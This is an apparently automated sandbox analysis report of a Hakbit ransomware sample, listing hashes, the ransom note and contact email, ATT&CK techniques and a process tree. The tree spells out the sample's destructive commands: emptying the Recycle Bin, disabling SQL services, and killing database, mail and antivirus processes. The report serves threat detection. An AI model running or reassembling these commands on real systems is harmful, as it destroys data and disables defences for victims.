hakbit | 1423053f90855d33858db47f354055b660943104c1c18f848c9b7b415979dc5f

Target

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Size

80KB
MD5

8152a3d0d76f7e968597f4f834fdfa9d
SHA1

c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e
SHA256

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b
SHA512

eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4

Score

10^/10

hakbit ransomware spyware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note

To recover your data contact the email below potentialenergy@mail.ru Key Identifier: PhBbquY7Gjdt5ZL+KaKK9pLYeJBlwTNN/0RmZZwJqYbO9X7VaewY7nS5Bq5CTwShm50H6Vm2BVW3wsyyfvCnm/Ul6swxxudQkwuyXsCOAc/perCj44tb8BX2wn7BWVEL8PBB7bgbhED38tbnnJFhxlRMcIcfMBOECPbUD59qRgY6BzRCdeyUGRHwFo/jRkwWmAwdUr43a2mzKv/zI9/uaLFt8Bh+ToRBN+x22gG29/vj020o0SoWAaejWSVOHXmOx8p464FxBMdOChNMYH9xQeHWM0Ktk+6UEtMDfj1pA7XGJDV+Klq2Bs55cMWTwUwP4mU/7+t0MMGKjQxRNBq3azauol6Sk8J8Z8GkD/SM1D8X2G5GXloEn4Pu1NQxMc6A8OeGvxBRYxCf6t6TxuLyakJNTm60QCq473LxPRnp/9s6z/UAFPkud+YREc3JuXHicPFWvuTCt5ZZels8VAFY6F+2Y9XzuIYBdzlO+3Em0vPoNmIVs6JGWp1Vk2HCryhw3lc8zq0qkGSVZ569GNV6jpdz4ceLE8XQ+2DVPZF+rHegoDszqQ2tV9R45qsYiLRdWkkDUwL/kNPvzQUolMM9Gj3W2GHsn+jvObEsdt8nJlebgjkgtEGdl9VLXIKZYuXKgqliGhMPo8oiQpa9takRcWg8AXZFLuzzfdLnPTIO+kw= Number of files that were processed is: 421

Emails

potentialenergy@mail.ru

Signatures

Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
ransomware hakbit
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

2792 cmd.exe

pid	process
2792	cmd.exe

Drops startup file 1 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Kills process with taskkill 47 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
416	taskkill.exe
1788	taskkill.exe
2848	taskkill.exe
840	taskkill.exe
820	taskkill.exe
364	taskkill.exe
1588	taskkill.exe
2172	taskkill.exe
2980	taskkill.exe
2184	taskkill.exe
1552	taskkill.exe
1208	taskkill.exe
1672	taskkill.exe
604	taskkill.exe
824	taskkill.exe
1020	taskkill.exe
740	taskkill.exe
1492	taskkill.exe
668	taskkill.exe
2104	taskkill.exe
792	taskkill.exe
1468	taskkill.exe
1712	taskkill.exe
728	taskkill.exe
936	taskkill.exe
1780	taskkill.exe
940	taskkill.exe
1692	taskkill.exe
1768	taskkill.exe
2908	taskkill.exe
1536	taskkill.exe
1804	taskkill.exe
1736	taskkill.exe
324	taskkill.exe
1388	taskkill.exe
2896	taskkill.exe
2940	taskkill.exe
3048	taskkill.exe
1772	taskkill.exe
1312	taskkill.exe
1484	taskkill.exe
1720	taskkill.exe
1632	taskkill.exe
1132	taskkill.exe
428	taskkill.exe
2140	taskkill.exe
2860	taskkill.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

2712 notepad.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2480 PING.EXE

pid	process
2712	notepad.exe

pid	process
2480	PING.EXE

Suspicious behavior: EnumeratesProcesses 22684 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

pid	process
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Token: SeDebugPrivilege	1672	taskkill.exe
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	936	taskkill.exe
Token: SeDebugPrivilege	324	taskkill.exe
Token: SeDebugPrivilege	1468	taskkill.exe
Token: SeDebugPrivilege	364	taskkill.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	820	taskkill.exe
Token: SeDebugPrivilege	840	taskkill.exe
Token: SeDebugPrivilege	1312	taskkill.exe
Token: SeDebugPrivilege	1632	taskkill.exe
Token: SeDebugPrivilege	728	taskkill.exe
Token: SeDebugPrivilege	1132	taskkill.exe
Token: SeDebugPrivilege	740	taskkill.exe
Token: SeDebugPrivilege	792	taskkill.exe
Token: SeDebugPrivilege	940	taskkill.exe
Token: SeDebugPrivilege	428	taskkill.exe
Token: SeDebugPrivilege	2140	taskkill.exe
Token: SeDebugPrivilege	416	taskkill.exe
Token: SeDebugPrivilege	668	taskkill.exe
Token: SeDebugPrivilege	1388	taskkill.exe
Token: SeDebugPrivilege	1484	taskkill.exe
Token: SeDebugPrivilege	1692	taskkill.exe
Token: SeDebugPrivilege	1788	taskkill.exe
Token: SeDebugPrivilege	1020	taskkill.exe
Token: SeDebugPrivilege	1588	taskkill.exe
Token: SeDebugPrivilege	1804	taskkill.exe
Token: SeDebugPrivilege	1780	taskkill.exe
Token: SeDebugPrivilege	2104	taskkill.exe
Token: SeDebugPrivilege	604	taskkill.exe
Token: SeDebugPrivilege	1720	taskkill.exe
Token: SeDebugPrivilege	1772	taskkill.exe
Token: SeDebugPrivilege	1768	taskkill.exe
Token: SeDebugPrivilege	824	taskkill.exe
Token: SeDebugPrivilege	1208	taskkill.exe
Token: SeDebugPrivilege	1712	taskkill.exe
Token: SeDebugPrivilege	2172	taskkill.exe
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeDebugPrivilege	2184	taskkill.exe
Token: SeDebugPrivilege	2940	taskkill.exe
Token: SeDebugPrivilege	2860	taskkill.exe
Token: SeDebugPrivilege	2908	taskkill.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeDebugPrivilege	2980	taskkill.exe
Token: SeDebugPrivilege	2896	taskkill.exe
Token: SeDebugPrivilege	3048	taskkill.exe
Token: SeDebugPrivilege	2848	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

pid process

1036 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

pid process

1036 69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Suspicious use of WriteProcessMemory 177 IoCs

Processes:

69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

description	pid	process	target process
PID 1036 wrote to memory of 1984	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	cmd.exe
PID 1036 wrote to memory of 1984	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	cmd.exe
PID 1036 wrote to memory of 1984	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	cmd.exe
PID 1036 wrote to memory of 1968	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 1036 wrote to memory of 1968	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 1036 wrote to memory of 1968	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 1036 wrote to memory of 668	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 1036 wrote to memory of 668	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 1036 wrote to memory of 668	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 1036 wrote to memory of 592	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 1036 wrote to memory of 592	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 1036 wrote to memory of 592	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 1036 wrote to memory of 912	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 1036 wrote to memory of 912	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 1036 wrote to memory of 912	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	sc.exe
PID 1036 wrote to memory of 792	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 792	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 792	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1804	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1804	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1804	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1692	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1692	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1692	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1720	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1720	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1720	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1772	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1772	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1772	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1672	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1672	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1672	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1468	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1468	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1468	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1208	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1208	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1208	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1312	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1312	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1312	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 604	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 604	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 604	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 824	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 824	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 824	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 840	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 840	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 840	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1020	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1020	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 1020	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 820	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 820	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 820	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 364	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 364	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 364	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 740	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 740	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 740	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe
PID 1036 wrote to memory of 416	1036	69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
1⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1036

C:\Windows\system32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
2⤵
PID:1984

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:1968

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:668

C:\Windows\system32\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:912

C:\Windows\system32\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:592

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:792

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1804

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1720

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1312

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1468

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1672

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1692

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:604

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:824

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:840

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:820

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:364

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:740

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:416

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:728

C:\Windows\system32\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
PID:1492

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1552

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:324

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1132

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:936

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:428

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
